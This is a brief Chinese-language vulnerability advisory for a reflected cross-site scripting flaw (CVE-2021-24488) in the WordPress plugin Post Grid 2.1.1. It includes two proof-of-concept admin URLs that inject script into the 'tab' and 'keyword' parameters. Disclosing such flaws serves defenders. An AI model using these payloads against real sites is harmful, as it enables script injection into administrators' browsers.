WordPress 插件 Post Grid 2.1.1 跨站脚本 (XSS)

# 软件链接：https://wordpress.org/plugins/post-grid/

# 版本：2.1.1

# 测试：Windows 10

# CVE：CVE-2021-24488

一、说明：

这个插件从任何帖子类型创建一个帖子网格。通过插件设置的滑块导入搜索功能和选项卡参数容易受到反射的跨站点脚本的攻击。

2. 概念证明：

代码语言：javascript复制

wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script>
wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//

windows 插件 反射 脚本 搜索

0 人点赞